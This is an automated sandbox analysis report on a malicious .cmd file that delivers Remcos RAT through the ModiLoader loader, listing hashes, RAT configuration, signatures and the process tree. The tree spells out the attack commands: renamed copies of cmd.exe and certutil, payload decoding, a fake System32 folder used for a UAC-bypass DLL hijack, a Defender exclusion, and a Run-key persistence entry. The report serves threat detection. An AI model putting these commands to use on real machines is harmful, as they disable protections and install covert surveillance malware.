Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
22-04-2024 08:58
Static task
static1
Behavioral task
behavioral1
Sample
ref_00291882384892.cmd
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
ref_00291882384892.cmd
Resource
win10v2004-20240412-en
General
-
Target
ref_00291882384892.cmd
-
Size
4.3MB
-
MD5
23f87d5ed3ef12efda90bf6ba82e2bd6
-
SHA1
ec451f0de91170a6702547159ef9d189c85d1018
-
SHA256
c3cffa55b7f7c7f80dd9302c3796b7bce79102ae75e4592d84d165aadf9c0743
-
SHA512
d849eccfe99697ebeb058f7817af13873e3eeb73fcb78ad8eeb5a6fec89b269533a6e296d53625e69546fce6e0e6942ebe8cb08f5db0a5aadaad3ff23719cd53
-
SSDEEP
49152:fHZjpt3K90OHGHS/jltrYcZ4t6CgGP9KUJM0tDNm5Rg4/VuqK1BdeW9e6P:9
Malware Config
Extracted
remcos
Future2025
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remi
-
mouse_option
false
-
mutex
Rmc-RFUXJL
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4696-30-0x0000000002FD0000-0x0000000003FD0000-memory.dmp modiloader_stage2 -
Executes dropped EXE 10 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exesppsvc.pifalpha.exealpha.exeeasinvoker.exealpha.exepid process 5108 alpha.exe 2244 alpha.exe 1160 kn.exe 2124 alpha.exe 3988 kn.exe 4696 sppsvc.pif 2156 alpha.exe 3296 alpha.exe 3412 easinvoker.exe 1608 alpha.exe -
Loads dropped DLL 1 IoCs
Processes:
easinvoker.exepid process 3412 easinvoker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
sppsvc.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mywiztwu = "C:\\Users\\Public\\Mywiztwu.url" sppsvc.pif -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
xcopy.exexcopy.exexcopy.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 49 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 53 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4956 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
sppsvc.pifpid process 4696 sppsvc.pif -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exesppsvc.pifcmd.exeeasinvoker.execmd.exealpha.exedescription pid process target process PID 3980 wrote to memory of 2484 3980 cmd.exe extrac32.exe PID 3980 wrote to memory of 2484 3980 cmd.exe extrac32.exe PID 3980 wrote to memory of 5108 3980 cmd.exe alpha.exe PID 3980 wrote to memory of 5108 3980 cmd.exe alpha.exe PID 5108 wrote to memory of 2180 5108 alpha.exe extrac32.exe PID 5108 wrote to memory of 2180 5108 alpha.exe extrac32.exe PID 3980 wrote to memory of 2244 3980 cmd.exe alpha.exe PID 3980 wrote to memory of 2244 3980 cmd.exe alpha.exe PID 2244 wrote to memory of 1160 2244 alpha.exe kn.exe PID 2244 wrote to memory of 1160 2244 alpha.exe kn.exe PID 3980 wrote to memory of 2124 3980 cmd.exe alpha.exe PID 3980 wrote to memory of 2124 3980 cmd.exe alpha.exe PID 2124 wrote to memory of 3988 2124 alpha.exe kn.exe PID 2124 wrote to memory of 3988 2124 alpha.exe kn.exe PID 3980 wrote to memory of 4696 3980 cmd.exe sppsvc.pif PID 3980 wrote to memory of 4696 3980 cmd.exe sppsvc.pif PID 3980 wrote to memory of 4696 3980 cmd.exe sppsvc.pif PID 3980 wrote to memory of 2156 3980 cmd.exe alpha.exe PID 3980 wrote to memory of 2156 3980 cmd.exe alpha.exe PID 3980 wrote to memory of 3296 3980 cmd.exe alpha.exe PID 3980 wrote to memory of 3296 3980 cmd.exe alpha.exe PID 4696 wrote to memory of 604 4696 sppsvc.pif cmd.exe PID 4696 wrote to memory of 604 4696 sppsvc.pif cmd.exe PID 4696 wrote to memory of 604 4696 sppsvc.pif cmd.exe PID 604 wrote to memory of 1652 604 cmd.exe cmd.exe PID 604 wrote to memory of 1652 604 cmd.exe cmd.exe PID 604 wrote to memory of 1652 604 cmd.exe cmd.exe PID 604 wrote to memory of 1656 604 cmd.exe xcopy.exe PID 604 wrote to memory of 1656 604 cmd.exe xcopy.exe PID 604 wrote to memory of 1656 604 cmd.exe xcopy.exe PID 604 wrote to memory of 2344 604 cmd.exe cmd.exe PID 604 wrote to memory of 2344 604 cmd.exe cmd.exe PID 604 wrote to memory of 2344 604 cmd.exe cmd.exe PID 604 wrote to memory of 2780 604 cmd.exe xcopy.exe PID 604 wrote to memory of 2780 604 cmd.exe xcopy.exe PID 604 wrote to memory of 2780 604 cmd.exe xcopy.exe PID 604 wrote to memory of 2180 604 cmd.exe cmd.exe PID 604 wrote to memory of 2180 604 cmd.exe cmd.exe PID 604 wrote to memory of 2180 604 cmd.exe cmd.exe PID 604 wrote to memory of 4460 604 cmd.exe xcopy.exe PID 604 wrote to memory of 4460 604 cmd.exe xcopy.exe PID 604 wrote to memory of 4460 604 cmd.exe xcopy.exe PID 604 wrote to memory of 3412 604 cmd.exe easinvoker.exe PID 604 wrote to memory of 3412 604 cmd.exe easinvoker.exe PID 3412 wrote to memory of 1160 3412 easinvoker.exe cmd.exe PID 3412 wrote to memory of 1160 3412 easinvoker.exe cmd.exe PID 1160 wrote to memory of 4628 1160 cmd.exe extrac32.exe PID 1160 wrote to memory of 4628 1160 cmd.exe extrac32.exe PID 1160 wrote to memory of 1608 1160 cmd.exe alpha.exe PID 1160 wrote to memory of 1608 1160 cmd.exe alpha.exe PID 1608 wrote to memory of 4956 1608 alpha.exe powershell.exe PID 1608 wrote to memory of 4956 1608 alpha.exe powershell.exe PID 4696 wrote to memory of 3584 4696 sppsvc.pif extrac32.exe PID 4696 wrote to memory of 3584 4696 sppsvc.pif extrac32.exe PID 4696 wrote to memory of 3584 4696 sppsvc.pif extrac32.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ref_00291882384892.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\ref_00291882384892.cmd" "C:\\Users\\Public\\sppsvc.rtf" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\ref_00291882384892.cmd" "C:\\Users\\Public\\sppsvc.rtf" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 123⤵
- Executes dropped EXE
-
C:\Users\Public\Libraries\sppsvc.pifC:\Users\Public\Libraries\sppsvc.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y4⤵
- Enumerates system info in registry
-
C:\Windows \System32\easinvoker.exe"C:\Windows \System32\easinvoker.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe6⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Mywiztwu.PIF3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\remi\logs.datFilesize
144B
MD54b4bcb1b3bdf550cbe8fc25e77ae9bd3
SHA19d2f47f012f81b0b13c661737f1fdef34abc6e4e
SHA256f27ffebe8862c4c3152138a1b10e43d6bce2afdeceeafa51c67dfcdcf334c08d
SHA512d38dcc1d8899a1bb8046634383ed8a7f2432ee3d0657cabfd76e18cf755097c463c706b23e0ef74979be503e768da32675221a580f9d28d18ed2268d81201d82
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bafhu3uk.4ih.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Libraries\MywiztwuO.batFilesize
29KB
MD5828ffbf60677999579dafe4bf3919c63
SHA1a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc
SHA256abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d
SHA512bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e
-
C:\Users\Public\Libraries\aaa.batFilesize
3KB
MD571e46efe9932b83b397b44052513fb49
SHA1741af3b8c31095a0cc2c39c41e62279684913205
SHA25611c20fabf677cd77e8a354b520f6ffca09cac37ce15c9932550e749e49efe08a
SHA51276da3b441c0eaaaabdd4d21b0a3d4aa7fd49d73a5f0dab2cfb39f2e114efe4f4dabe2d46b01b66d810d6e0efa97676599ece5c213c1a69a5f2f4897a9b4ac8da
-
C:\Users\Public\Libraries\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Users\Public\Libraries\netutils.dllFilesize
114KB
MD5566b326055c3ed8e2028aa1e2c1054d0
SHA1c25fa6d6369c083526cafcf45b5f554635afe218
SHA256a692d4305b95e57e2cfc871d53a41a5bfc9e306cb1a86ca1159db4f469598714
SHA512da4b0b45d47757b69f9abc1817d3cb3c85deb08658e55f07b016fba053efe541a5791b9b2b380c25b440bbae6916c5a2245261553ca3c5025d9d55c943f9823c
-
C:\Users\Public\Libraries\sppsvc.pifFilesize
1.6MB
MD55dc72c0758be865d60ec49da3b18ada6
SHA1e8f1248535ccb846a25f7cabe6cdd561343854dd
SHA25618ed0f120637017977b5f606feac6bca90a5cf28839f98c35b6ff3e9b4a0d01f
SHA5120d4a8d2c01ef7d56bd379c294ff976db61e1ff9fbf56b6c2c1835c8a706954555b8a03fb35b8d21881686363d30ed39f4b2a3a68b9f40a97bcfd60774b53f53e
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\sppsvc.rtfFilesize
3.1MB
MD5dae8075cb28bc2772caf6ff7eaecf90b
SHA19153b65e9e1b58039a1efc37a26276f03ffd1c28
SHA256aebd8a641bf4d2394e1e94f4e2b285f5dae110d68a7a0c524c4261c34b7aad91
SHA51281632d9ba844b047a5fb9f32c5543bbe6e7fed68e14e7e530d380001b0a368892f21cf3f3875c9334137ed3423b1c37b9e143042951e19a1daaa8ffa2c35f434
-
memory/3412-52-0x00000000613C0000-0x00000000613E3000-memory.dmpFilesize
140KB
-
memory/4696-80-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-110-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-133-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-32-0x0000000000400000-0x0000000000598000-memory.dmpFilesize
1.6MB
-
memory/4696-132-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-122-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-121-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-111-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-29-0x0000000002FD0000-0x0000000003FD0000-memory.dmpFilesize
16.0MB
-
memory/4696-83-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-84-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-85-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-86-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-87-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-88-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-92-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-30-0x0000000002FD0000-0x0000000003FD0000-memory.dmpFilesize
16.0MB
-
memory/4696-99-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-100-0x00000000158E0000-0x00000000168E0000-memory.dmpFilesize
16.0MB
-
memory/4696-28-0x0000000000890000-0x0000000000891000-memory.dmpFilesize
4KB
-
memory/4956-74-0x00007FFF3DBC0000-0x00007FFF3E681000-memory.dmpFilesize
10.8MB
-
memory/4956-71-0x000001F11E270000-0x000001F11E280000-memory.dmpFilesize
64KB
-
memory/4956-70-0x000001F11E270000-0x000001F11E280000-memory.dmpFilesize
64KB
-
memory/4956-69-0x00007FFF3DBC0000-0x00007FFF3E681000-memory.dmpFilesize
10.8MB
-
memory/4956-64-0x000001F11E1D0000-0x000001F11E1F2000-memory.dmpFilesize
136KB